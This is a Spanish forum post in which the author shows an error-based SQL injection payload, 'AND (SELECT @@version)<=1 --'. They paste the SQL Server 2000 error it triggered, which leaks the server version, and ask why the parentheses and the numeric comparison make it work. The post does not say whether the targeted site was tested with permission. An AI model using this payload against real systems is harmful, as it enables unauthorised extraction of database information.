Hola...
Conseguí ejecutar la sentencia 'SELECT @@version' y ver información del sistema...
Pero he tenido que hacer una cosa, y no entiendo el PORQUE funciona, aver si me lo podeis explicar:
La inyección ha sido la siguiente:
AND (SELECT @@version)<=1 --
Y como se puede observar, despues de la inyección, he tenido que añadir el menor o igual que 1 (<=1) y asi si funciona, y se ejecuta la sentencia devolviendo lo siguiente:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Error de sintaxis al convertir el valor nvarchar 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2) ' para una columna de tipo de datos int.
Por lo que se ve, funcionaaa...
Ahora no entiendo 2 cosas, aver si me podeis explicar....
1 - ¿Porque sin parantesis la sentencia no funciona?
2 - ¿Porque tengo que añadir esa comparación númerica?
¿Alguien me puede aclarar estos 2 puntos, se lo agradeceria muchisimo.
Un saludo.